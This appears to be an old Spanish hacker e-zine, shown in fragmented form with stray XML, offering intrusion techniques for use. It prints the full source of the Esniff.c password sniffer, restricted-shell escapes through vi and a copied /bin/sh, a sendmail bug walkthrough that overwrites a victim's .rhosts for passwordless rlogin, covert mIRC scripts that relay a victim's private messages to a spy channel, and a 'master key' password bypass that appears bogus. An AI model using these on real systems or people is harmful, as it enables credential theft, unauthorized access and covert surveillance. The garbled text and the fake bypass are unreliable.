de los sniffers es que hay uno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da sistema, pero si encontramos uno para el nuestro ( cosa que no seria mu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ra ) no est de mas ponerlo para futuros "trabajos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qui incluyo el codigo de uno que quizas os sirva, es el codigo original,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y que a¤adirle alguna cosa asi que leed lo un poco por las lineas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iezan por /* Este sniffer deberia funcionar en  casi todos los *NIX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----------------------------------CORTAD AQUI-------------------------------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* Esniff.c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tdio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ctype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tring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ys/time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ys/file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ys/stropts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ys/signal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ys/types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ys/socket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sys/ioctl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net/if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net/nit_if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net/nit_buf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net/if_arp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netinet/in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netinet/if_ether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netinet/in_systm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netinet/ip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netinet/udp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netinet/ip_var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netinet/udp_var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netinet/in_systm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netinet/tcp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netinet/ip_icmp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netdb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include &lt;arpa/inet.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ERR stde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    *malloc(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    *devi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*ProgNa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*LogNa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   *LO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     debug=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NIT_DEV     "/dev/ni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CHUNKSIZE   4096        /* device buffer size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     if_fd = -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     Packet[CHUNKSIZE+32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d Pexit(err,ms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 err; char *ms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 perror(ms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it(err);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d Zexit(err,ms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 err; char *ms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 fprintf(ERR,ms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it(err);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IP          ((struct ip *)Pack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IP_OFFSET   (0x1FF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SZETH       (sizeof(struct ether_header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IPLEN       (ntohs(ip-&gt;ip_len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IPHLEN      (ip-&gt;ip_h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TCPOFF      (tcph-&gt;th_of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IPS         (ip-&gt;ip_sr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IPD         (ip-&gt;ip_d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TCPS        (tcph-&gt;th_spor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TCPD        (tcph-&gt;th_dpor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IPeq(s,t)   ((s).s_addr == (t).s_add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TCPFL(FLAGS) (tcph-&gt;th_flags &amp; (FLAGS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MAXBUFLEN  (12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_t  LastTIME =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uct CREC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truct CREC *Nex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*Las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ime_t  Time;              /* start time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truct in_addr SRCi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STi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u_int   SRCport,           /* src/dst ports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DSTpor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u_char  Data[MAXBUFLEN+2]; /* important stuff :-)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u_int   Length;            /* current data length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u_int   PKcnt;             /* # pkts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u_long  LASTseq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uct CREC *CLroot = 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 *Symaddr(i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er struct in_addr i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 register struct hostent *he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gethostbyaddr((char *)&amp;ip.s_addr, sizeof(struct in_addr),AF_IN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turn( (he)?(he-&gt;h_name):(inet_ntoa(ip)) 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 *TCPflags(flg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er u_char flg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 static char iobuf[8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SFL(P,THF,C) iobuf[P]=((flgs &amp; THF)?C:'-'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FL(0,TH_FIN, 'F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FL(1,TH_SYN, 'S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FL(2,TH_RST, 'R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FL(3,TH_PUSH,'P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FL(4,TH_ACK, 'A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FL(5,TH_URG, 'U'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obuf[6]=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turn(iobuf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 *SERVp(por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er u_int por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 static char buf[10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gister char *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witch(port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ase IPPORT_LOGINSERVER: p="rlogin"; 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ase IPPORT_TELNET:      p="telnet"; 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ase IPPORT_SMTP:        p="smtp"; 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ase IPPORT_FTP:         p="ftp"; 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efault: sprintf(buf,"%u",port); p=buf; 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turn(p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 *Ptm(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er time_t *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 register char *p = ctime(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[strlen(p)-6]=0; /* strip " YYYY\n"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turn(p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 *NOWtm(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 time_t tm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me(&amp;tm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turn( Ptm(&amp;tm) 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MAX(a,b) (((a)&gt;(b))?(a):(b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MIN(a,b) (((a)&lt;(b))?(a):(b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* add an item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ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) {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gister struct CREC *CLtmp =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(struct CREC *)malloc(sizeof(struct CREC))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me( &amp;(CLtmp-&gt;Time) )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tmp-&gt;SRCip.s_addr = SIP.s_addr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tmp-&gt;DSTip.s_addr = DIP.s_addr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tmp-&gt;SRCport = SPORT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tmp-&gt;DSTport = DPORT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tmp-&gt;Length = MIN(LEN,MAXBUFLEN)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copy( (u_char *)DATA, (u_char *)CLtmp-&gt;Data, CLtmp-&gt;Length)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tmp-&gt;PKcnt = 1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tmp-&gt;Next = CLroot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tmp-&gt;Last = NULL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root = CLtmp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er struct CREC *GET_NODE(Sip,SP,Dip,D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er struct in_addr Sip,Di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er u_int SP,D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 register struct CREC *CLr = CLroo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ile(CLr != NULL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 (CLr-&gt;SRCport == SP) &amp;&amp; (CLr-&gt;DSTport == DP) &amp;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Peq(CLr-&gt;SRCip,Sip) &amp;&amp; IPeq(CLr-&gt;DSTip,Dip)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Lr = CLr-&gt;Nex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turn(CLr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ADDDATA_NODE(CL,DATA,LEN) {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copy((u_char *)DATA, (u_char *)&amp;CL-&gt;Data[CL-&gt;Length],LEN)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L-&gt;Length += LEN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PR_DATA(dp,ln) {   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gister u_char lastc=0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ile(ln-- &gt;0) {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f(*dp &lt; 32) { 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witch(*dp) {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case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0')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break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case '\r':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case '\n': fprintf(LOG,"\n     : ")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break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default  : fprintf(LOG,"^%c", (*dp + 64))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break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}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} else {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(isprint(*dp)) fputc(*dp,LOG)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else fprintf(LOG,"(%d)",*dp)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}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astc = *dp++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}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flush(LOG)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d END_NODE(CLe,d,dl,ms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er struct CREC *CL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er u_char *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er int d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er char *ms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printf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&amp;CLe-&gt;Time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printf(LOG," PATH: %s(%s) =&gt;", Symaddr(CLe-&gt;SRCip),SERVp(CLe-&gt;SRCport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printf(LOG," %s(%s)\n", Symaddr(CLe-&gt;DSTip),SERVp(CLe-&gt;DSTport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printf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n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NOWtm(),CLe-&gt;PKcnt,(CLe-&gt;Length+dl),ms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printf(LOG," DATA: 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{ register u_int i = CLe-&gt;Length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register u_char *p = CLe-&gt;Data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PR_DATA(p,i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PR_DATA(d,dl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printf(LOG,"\n-- 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flush(LO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(CLe-&gt;Next != NU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Le-&gt;Next-&gt;Last = CLe-&gt;Las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(CLe-&gt;Last != NU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Le-&gt;Last-&gt;Next = CLe-&gt;Nex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Lroot = CLe-&gt;Nex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e(CLe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* 30 mins (x 60 seconds)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IDLE_TIMEOUT 1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define IDLE_NODE() {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me_t tm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me(&amp;tm)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(LastTIME&lt;tm) {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egister struct CREC *CLe,*CLt = CLroot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astTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT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hile(CLe=CLt) {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Lt=CLe-&gt;Next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if(CLe-&gt;Time &lt;tm)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END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT");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}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}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d filter(cp, pktle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er char *c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ister u_int pktle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gister struct ip     *i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gister struct tcphdr *tcph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{ register u_short EtherType=ntohs(((struct ether_header *)cp)-&gt;ether_type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(EtherType &lt; 0x600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EtherType = *(u_short *)(cp + SZETH + 6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p+=8; pktlen-=8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(EtherType != ETHERTYPE_IP) /* chuk it if its not IP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retur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/* ugh, gotta do an alignment :-(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copy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH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p = (struct ip *)Packe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f( ip-&gt;ip_p != IPPROTO_TCP) /* chuk non tcp pkts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tur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cph = (struct tcphdr *)(Packet + IPHLEN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f(!( (TCPD == IPPORT_TELNET) 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(TCPD == IPPORT_LOGINSERVER) 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(TCPD == IPPORT_FT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)) retur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{ register struct CREC *CLm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gister int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4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gister u_char *p = (u_char *)Packe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 += ((IPHLEN * 4) + (TCPOFF * 4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f(debug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printf(LOG,"PKT: (%s %04X) ", TCPflags(tcph-&gt;th_flags),length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printf(LOG,"%s[%s] =&gt; ", inet_ntoa(IPS),SERVp(TCPS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printf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD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( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) 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CLm-&gt;PKcnt++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if(length&gt;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( (CLm-&gt;Length + length) &lt; MAXBUFLEN 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ADDDATA_NODE( CLm, p,length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} else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END_NODE( CLm, p,length, "DATA LIMIT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if(TCPFL(TH_FIN|TH_RST)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END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" 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} else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if(TCPFL(TH_SYN)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DD_NODE(IPS,IPD,TCPS,TCPD,p,length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DLE_NODE(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* signal hand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d death(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 register struct CREC *CL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while(CLe=CLroo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END_NODE( CLe, (u_char *)NULL,0, "SIGNAL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printf(LOG,"\nLog ended at =&gt; %s\n",NOWtm(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flush(LO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LOG != stdou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fclose(LO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xit(1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* opens network interface, performs ioctls and reads from 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passing data to filter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d do_it(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t cc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ar *buf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u_short sp_ts_le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!(buf=malloc(CHUNKSIZE)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exit(1,"Eth: malloc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* this /dev/nit initialization code pinched from etherfind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truct strioctl si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truct ifreq    if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truct timeval  timeou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u_int  chunksize = CHUNKSIZ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u_long if_flags  = NI_PROMISC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(if_fd = open(NIT_DEV, O_RDONLY)) &lt;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exit(1,"Eth: nit ope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ioctl(if_fd, I_SRDOPT, (char *)RMSGD) &lt;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exit(1,"Eth: ioctl (I_SRDOPT)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.ic_timout = INFTIM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ioctl(if_fd, I_PUSH, "nbuf") &lt;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exit(1,"Eth: ioctl (I_PUSH \"nbuf\")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imeout.tv_sec = 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imeout.tv_usec = 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.ic_cmd = NIOCS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.ic_len = sizeof(timeou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.ic_dp  = (char *)&amp;timeou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ioctl(if_fd, I_STR, (char *)&amp;si) &lt;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exit(1,"Eth: ioctl (I_STR: NIOCSTIME)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.ic_cmd = NIOCSCHUN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.ic_len = sizeof(chunksize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.ic_dp  = (char *)&amp;chunksiz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ioctl(if_fd, I_STR, (char *)&amp;si) &lt;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exit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)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trncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name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r.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'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.ic_cmd = NIOCBI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.ic_len = sizeof(ifr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.ic_dp  = (char *)&amp;if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ioctl(if_fd, I_STR, (char *)&amp;si) &lt;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exit(1,"Eth: ioctl (I_STR: NIOCBIND)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.ic_cmd = NIOCSFLAG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.ic_len = sizeof(if_flags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.ic_dp  = (char *)&amp;if_flag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ioctl(if_fd, I_STR, (char *)&amp;si) &lt;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exit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)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ioctl(if_fd, I_FLUSH, (char *)FLUSHR) &lt;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exit(1,"Eth: ioctl (I_FLUSH)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while ((cc = read(if_fd, buf, CHUNKSIZE)) &gt;= 0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egister char *bp = buf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*bufstop = (buf + cc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hile (bp &lt; bufstop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er char *cp = b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er struct nit_bufhdr *hdr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hdrp = (struct nit_bufhdr *)c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cp += sizeof(struct nit_bufhdr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bp += hdrp-&gt;nhb_totle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filter(cp, (u_long)hdrp-&gt;nhb_msglen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exit((-1),"Eth: read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/* Authorize your proogie,generate your own password and uncomment here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* #define AUTHPASSWD "EloiZgZejWyms"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d getauth(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 char *buf,*getpass(),*crypt(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 pwd[21],prmpt[81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trcpy(pwd,AUTHPASSWD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printf(prmpt,"(%s)UP? ",ProgName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buf=getpass(prmp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strcmp(pwd,crypt(buf,pwd)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exit(1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d main(argc, argv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 argc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 **argv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ar   cbuf[BUFSIZ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truct ifconf ifc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t    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c=1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backg=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ogName=argv[0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/*     getauth(); *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LOG=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vice=NU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while((ac&lt;argc) &amp;&amp; (argv[ac][0] == '-')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register char ch = argv[ac++][1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switch(toupper(ch)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case 'I': device=argv[ac++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case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")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Zexit(1,"Output file cant be opened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case 'B': backg=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case 'D': debug=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default : fprintf(ER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"Usage: %s [-b] [-d] [-i interface] [-f file]\n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ProgName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exit(1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!device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((s=socket(AF_INET, SOCK_DGRAM, 0)) &lt;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Pexit(1,"Eth: socket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c.ifc_len = sizeof(cbuf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c.ifc_buf = cbuf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(ioctl(s, SIOCGIFCONF, (char *)&amp;ifc) &lt; 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Pexit(1,"Eth: ioctl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lose(s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evice = ifc.ifc_req-&gt;ifr_na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printf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV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printf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout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(debug)?" (debug)":"",(backg)?" Backgrounding ":"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!LO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OG=stdou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gnal(SIGINT, death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gnal(SIGTERM,death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gnal(SIGKILL,death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gnal(SIGQUIT,death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backg &amp;&amp; debug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fprintf(ERR,"[Cannot bg with debug on]\n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backg=0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(backg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egister int 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((s=fork())&gt;0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fprintf(ERR,"[pid %d]\n",s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exit(0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} else if(s&lt;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Pexit(1,"fork"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f( (s=open("/dev/tty",O_RDWR))&gt;0 )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ioctl(s,TIOCNOTTY,(char *)NULL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lose(s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printf(LOG,"\nLog started at =&gt; %s [pid %d]\n",NOWtm(),getpid()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flush(LO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o_it(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----------------------------------FINAL------------------------------------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eno, ya hemos terminado espero que os haya servido de ayuda este texto,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yais comprendido como hackear un UN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 todas maneras si hay algo que no entendais, o alguna pregunta ya sabe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venspirit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##Por cierto las cartas tipo " ¨ que necesito para ser un hacker ? " ir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 trash directamente.###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!!!!Happy Hack ;-)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EZ RULE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ILL THE BIG BR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REE OUR D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{[-RavEn³SpiRiT-]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 especial para iDlEr: Si lees estas lineas mandame un mail, por que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dido tu direccion. Agradecimientos especiales para t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LLS DE UNIX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El shell de Un*x es el int‚rprete de mandatos del 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perativo. Cuando escribimos una orden en el prompt de un Un*x es el s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quien lee la orden y sus parmetros y la lleva a cabo. Es el interfa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ntre el sistema operativo (el kernel para ser ms exactos) y el usuar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o es el sistema operativo en s¡ mismo, el sistema operativo tambi‚n incluy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l kernel, llamadas al sistema, etc. y una serie de programas extern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herramientas o tools). En cierto modo cuando vemos que el Un*x es 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"feo" que otros sistemas operativos o que es ms potente, se debe al s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que empl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l shell es un programa igual que cualquier otro, hace un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unciones y otros programas hacen otras pero es un programa al fin y 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abo. Por ejemplo, una vez dentro del sistema podemos ejecutar des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uestro shell otro shell. El shell lo que hace es leer comandos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eclado, interpretarlos y llevar a cabo distintas acciones seg£n lo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ayamos escrito. Hace una de estas dos cosas: ejecuta ‚l mismo la or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si lo necesita se comunica con el kernel mediante llamadas al sistem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osa necesaria para poder usar hardaware como discos, impresoras, etc.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 bien llama a un programa externo y le pasa el control para que ejec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o que tenga que hac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 realidad se podr¡a llamar shell a cualquier programa que se p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n contacto con el kernel para realizar distintas tareas. Pero no a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ograma externo (en general son ¢rdenes no comprendidas en el shell) qu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or ejemplo, imprime en una impresora, porque lo ms probable es que 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ograma externo est‚ llamando al shell para que haga una llamad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istema al kernel para que ‚ste ponga a funcionar la impreso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 podr¡a escribir un libro entero (de hecho los hay) a cerca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hell, pero no es nuestro cometido ms que el dar una idea de lo que es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e ver un poco cuales son las diferencias ms importantes entre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istintos tipos de shells que nos podemos encontrar. Steve Bourne f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quien program¢ un shell que lleva su nombre (Bourne shell) para la AT&amp;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n cambio tambi‚n existen otros shells como el C-shell, Korn shel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stricted shell, etc. Cada uno tiene sus particularidades. No voy a po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odas pero s¡ las ms importan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h      -&gt; Bourne shell. Es el estndar de los Un*x basados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ystem V. Normalmente devuelve '$' ¢ '&amp;' como prompt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los usuarios sin privilegios de root y '#' para el/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oot/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sh     -&gt; C-Shell. Fue desarrollado en la universidad californian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Berkeley. Toma ese nombre por que su lenguaje de program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(ver apartado siguiente) se parece mucho al lenguaje C. E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ell tiene varias diferencias con el Bourne shell, es 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rpido en algunas tareas, permite escribir largos coman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on pocas teclas pulsadas, hace un mejor uso de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trabajos abiertos en multitarea, tiene ms seguridad a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hora de ejecutar determinados comandos, y ms. Tiene (al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on lo que hay que tener cuidado) un log de los comandos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vamos insertando para que, si necesitamos volverlo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ejecutar, con tan solo pulsar las teclas de cursor se v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ucediendo dichos comandos. Tambi‚n permite el emple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lias. El prompt que nos da suele ser '#' para el root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'%' para el resto de usuari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ksh     -&gt; Korn Shell. Tambi‚n escrito para la AT&amp;T. Recoge lo mej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de cada uno de los shells anteriores (Bourne y C). Ocup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s que los anteriores pero a su vez es ms potente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ualquiera de los dos. Tambi‚n guarda un log de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omandos, deja definir alias, etc. Permite cambiar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rompt a gusto del usuario por lo que nos podemos encontr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de todo pero por defecto son iguales que los del Bour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sh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sh     -&gt; Restricted Bourne Shell (shell Bourne restringido). Co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odeis imaginar sirve para que el root pueda restringir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uso de determinados comandos a los usuarios. Tan so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ermite ejecutar los comandos que el usuario tenga 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ath no pudiendo modificar ‚ste ni ninguna otra vari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del shell. Por lo dems es muy parecido (por no dec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gual) que el Bourne sh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xsiten ms shells como el bash de Linux pero estos son los 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mportantes y con los que ms frecuentemente nos podemos encontrar.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ambiar de shell hemos de ejecutar el nuevo shell. Por ejemplo: si n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ncontramos bajo una mquina en la que estamos usando el Bourne shell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queremos usar el C-Shell tan solo hemos de escribir 'csh' o en el caso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Korn Shell 'ksh', dudo que querais entrar en el restricted shell, ms bi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oder ejecutar otro (si teneis acceso a un restricted shell no os va dej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jecutar otro shell por las buena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Voy a hacer un inciso e intentar explicar como hacer que poda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altarnos el restricted shell (me referir‚ a ‚l como rsh a partir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qu¡). Lo primero es saber lo que no nos permite hacer exactamente. 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res cosas principalmente: ejecutar comandos fuera de nuestro path (por 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que el root solo nos pone el path a aquellos comandos que quiere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semos), no dejar cambiar de directorios ms que a los nuestros y no dej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que cambiemos las variables de entorno del shell (como la variable 'path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or ejempl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o ms fcil y lo primero a saber es que aunque no nos deje cambi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e directorio a otro que no nos pertenezca lo que s¡ podemos hacer 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ferirnos a ficheros de otros directorios mediante el path completo. As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o podremos poner la orden 'cd /etc' pero s¡ podremos ver el contenido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ichero passwd mediante el comando 'cat /etc/passwd', incluso podr¡a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direigir la salida a un fichero en nuestro directorio. Esto siempre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uando en el path o en el shell se incluya la orden en cuesti¢n (en e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aso 'cat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Uno de los fallos que tiene este shell es que el path lo lee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ichero '.profile' de la cuenta con la que entramos. As¡ podemos hacer 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iguiente (si es que podemos usar estos comandos): editamos el fich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'.profile' de nuestro home directory y a¤adimos directorios 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earchpath. Si a¤adimos el directorio donde se encuentra otro shell s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stricciones lo ejecutamos y BINGO !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tro m‚todo ser¡a el siguiente: hay programas (expondr‚ un ejemp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on uno de ellos) que permiten la salida a shell a trav‚s de ellos, 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ecir, que una de sus opciones sea dejar el programa y ejecutar un s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ejando ese programa en background. Imaginad que teneis acceso al edi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e textos 'vi' (cosa bastante normal), podeis crear un fichero y hacer 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iguien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$ vi fichero.prueba           #restricted s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:set shell=/bin/sh            #¢rdenes dirigi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:shell                        # al programa 'vi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$                             #nos devuelve un Bourne Sh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uando pongamos exit volveremos al 'vi' por lo que se podr¡a hacer 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iguiente si esto nos incomoda (es continuaci¢n de lo anterior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$cp /bin/sh $HOME/popo        #copiamos un shell a nuest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>#directorio al cual tenemos acce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>#incluso con restricted s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$exit                         #volvemos al 'vi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:q!                           #salimos del vi sin grabar el fich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$logout                       #volvemos al rsh y sali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IX ver. 3.2 hacked.host.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ogin: pe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asswor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$popo                         #iniciamos una sesi¢n y nos da un r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>#ejecutamos la copia que nos hab¡a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>#del Bourne s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$                             #nos devuelve un Bourne shell s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>#sin restricciones :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¨Sencillo verdad?. Una sola pega. No llameis 'popo' al nuevo shell ya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ial root le da por mirar los procesos en ejecuci¢n se podr¡a mosquea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nombradlo a 'rsh' y ejecutadlo tal y como se cuenta en otros aparata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ara evitar que, al seguir el path, se ejecute un restricted shell y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ste. Hackear es fcil, ¨o no?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a est bien de shells. Si quieres saber algo ms sobre shells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s dif¡cil de encontrar libros y documentaci¢n en librer¡as especializa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 en Internet. Nuestro prop¢sito ya est cumpli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alabras para ponerles un '1' al final de cada una y volver a probar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oner algunas letras en may£scula, eso ya depende del cracker que usem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 BUG DEL MES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udos amigos, aqui esta para serviros y para comentaros el bug de e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s el Dark Raver. Como no os sonara mi nombre, os dire que soy un fanati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 los ordenatas y por supuesto del hacking, que me podreis encontrar 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xis y que es la primera vez que escribo en esta super publicacion, y no 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 peloteo :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 han dejado libertad, para elegir el bug de este mes, pero me han dic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e no me porte mal }:-) Es una pena, pero habra que aguantarse. P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o he decidido continuar con lo que hizo Red en el numero anterior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s voy a explicar otro bug clasico del sendm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e bug es un poco mas moderno, que el que explico Red, y a lo mejor todav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iona en algun sitio, pero no os hagais ilusi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stemas: Unix's en gener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es: Sendmail, versiones anteriores a la 5.5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pcion: Bug del send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 este bug, los usuarios externos pueden sobre-escribir cualquier archiv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 no tenga nivel de r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jemplo: (No voy a poner ejemplos de sistemas operativos concretos. Intent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splicarme lo mas generalmente posible, y luego vosotros tendreis qu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licarlo a vustro sistema en concreto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cemos un telnet a victima.com al puerto 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cpt to: /home/pepe/.rhosts   --&gt;   Nombre (y situacion) del fichero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escribir. En este caso vamos a sobre-escrib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el rhosts del usuario llamado pe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l from: pe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Aqui pon lo que quieras, un comentario para el root por ejemplo :-)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   --&gt;   Normalmente te dara un mensaje de error, despues de po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el pun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cpt to: /home/pepe/.rhosts   --&gt;   Esto es muy importante, hay que hacer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</w:rPr>
        <w:t>2 ve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l from: pe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ta   --&gt;   Ahora en este segundo intento si que podras escribir en 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fiche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.ordenador.com   --&gt;   Esto es lo que se escribira en el archivo. Tambien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podria poner ' + + ' o algo simil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   --&gt;   Si no da mensaje de error es que ha funcion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pues hacemos un rlogin a victima.com como si fuesemos pepe, y co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 nombre de nuestro ordenador, aparece en su .rhosts (remote host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raremos sin problemas, ya que no nos pedira el pa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 comprender este texto, es necesario, tener un nivel medio en el manej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 sistemas unix. Si no has comprendido algo, mirate un manual sobre unix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instalate el linux en tu pc y practica un poco. Seguro que si lo h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e fichero te parecera cosa de ni¤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</w:rPr>
        <w:t>Dark Ra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Llave Maestra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ueno antes de explicar en que consiste esto deciros que esto no es 10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able y a causa de que nos llego un poco tarde esta informacion no he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dido probarlo en demasiados sitios pero lo importante es que funci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 alguno, si alguien despues de leer esto sabe un poco mas sobre lo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oy a explicar que se ponga en contacto conmigo, vamos al asun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 vosotros os preguntareis...que es esto de la llave maestra? bueno pu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blando de hack en este caso seria algo asi como una forma de entr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 cualquier sitio, algo que sirve para todo. Pues no es exactamente est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 este caso no funciona en todos los sitios, almenos probandolo nosotr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 trata de un sistema que consiste en poner unas ciertas palabras y esper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 cierto tiempo y Premio!! te "deja entrar" donde te pida un pasword.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qui esta la question, porque muy pocos sitios te piden solo el pasword,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si todos te piden un login y un pasword pero seguro que vosotros pode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provecharlo, por eso os lo explico ya y paro de enrrollarme  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uando te pidan un pasword (solo pasword, y en internet claro esta)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altarselo debeis hac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- poner TH78$ ^^rUI      (esperar 23 segundos, importantisimo el tiemp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- despues de haver pasado los 23 segundos poner R$%%78 ''TY (esper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10 segundo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-despues de haber esperado los 10 segundos poner 67Z// (y "deberia"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ejarte entra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o ya os hemos dicho esto no es 100% fiable, nosotros lo hemos prob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 9 sitios diferentes y tan solo 2 veces ha funcionado, en mas numer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 nos enteramos de algo sobre esto os informaremos, tened en cuenta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 tiempo ha de ser exacto, es muy importante, y tambien es importa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que solo os pida el pa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RC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ntes de todo deciros que todo lo que os diga debe ir en REMOTE dent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 EVENTS con el LISTENING marcado, y todas estas lineas las ha de te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a persona a la que quereis espiar, pero vosotros NO la teneis que te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ues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:ON TEXT:*:#:/msg #espia  $+ $chan $+  &lt; $+ $nick $+ &gt; $pa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vamos a explicar esta linea:cuando ayais conseguido que la persona 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aya puesto vosotros os vais al canal #espia (si quereis otro nomb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ambiarlo en la linea) y que es lo que hara? pues en ese canal #esp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s saldra todo lo que se diga en todos los canales que este la perso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spiada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:ON ACTION:*:#:/msg #espia  $+ $chan $+  * $nick $pa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parecida a la anterior pero en este caso solo sale en el canal #espia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/me que haga la gente de todos los canales que esta la persona espi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:ON TEXT:*:?:/msg #espia **Message from $nick $+ ** $parms | /closems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$n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Bastantes cosas a comentar sobre esto:con esta linea vereis lo que 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icen en los MSG al espiado, como siempre todo eso saldra en #espia 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ero solo saldra lo que le dicen al espiado, no saldra lo que dice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spiado a esa persona en el MSG, si quereis ver la conversacion de los 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endrian que tener los 2 esta linea, a parte tambien que si le mandan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SG al espiado el MSG no le llegara o no lo vera ya que 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bserais la linea vereis lo de /closemsg... pues eso hace que se cier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l msg, si quereis que no se le cierre cuando le mandan un MSG al espi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quitarlo. (es de logica quitarlo porque si no ve el MSG como va a escrib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n el MSG? pero yo por si acaso os explico todo ;) )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:ON NOTICE:*:#:/msg #espia  $+ $chan $+  - $+ $nick $+ - $pa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Es igual que lo de antes, solo que en vez de poder ver los MSG con es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inea puedes ver los DCC CHAT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1:ON OP:#:/msg #espia  $+ $chan $+  ** $nick sets mode: +o $opnick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Ves a todos los que opean (a todos los que opean de todos los can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n que esta el espiado)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1:ON DEOP:#:/msg #espia  $+ $chan $+  ** $nick sets mode: -o $opn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Lo mismo que la linea anterior pero en vez de ver a los que opean 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los que desopea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1:ON SERVEROP:#:/msg #espia  $+ $chan $+  ** Mode on $chan +o $server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Cuando ha habido una caida o un netsplit de gente que era OP y vuel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entrar, el server le vuelve a dar el OP, pues con esta linea ve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quien se lo da (de todos los canales que este el espiado)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1:ON JOIN:#:/msg #espia  $+ $chan $+  ** $nick has joined $ch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Ves a todos los que entran en el canal, como siempre lo ves en el ca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#espia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:ON PART:#:/msg #SpeedyLinkChannel  $+ $chan $+  ** $nick has left $c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Lo mismo pero ves los que sal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:ON TOPIC:#:/msg #espia  $+ $chan $+  $nick changed topic on $cha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$pa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Ves a la persona o personas que cambian el topic de todos los canales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e encuentre el espiado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1:ON NICK:/msg #espia  $nick changed nick to $newnick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Ves todos los que se cambian el nick de los canales o canal que este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spiado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ueno pues hasta aqui, lo unico complicado (no demasiado) seria conven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la persona que queremos espiar de poner alguna linea de estas, aun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guro que ya se os ocurrira algo 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>AD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KIKE´S P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FF0000"/>
        </w:rPr>
        <w:t>www.geocities.com/siliconvalley/Pines/57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Mi Mail es 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kiket@geocities.com </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">para ampli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algúna información</w:t>
        <w:tab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erdonar por las faltas de ortografia :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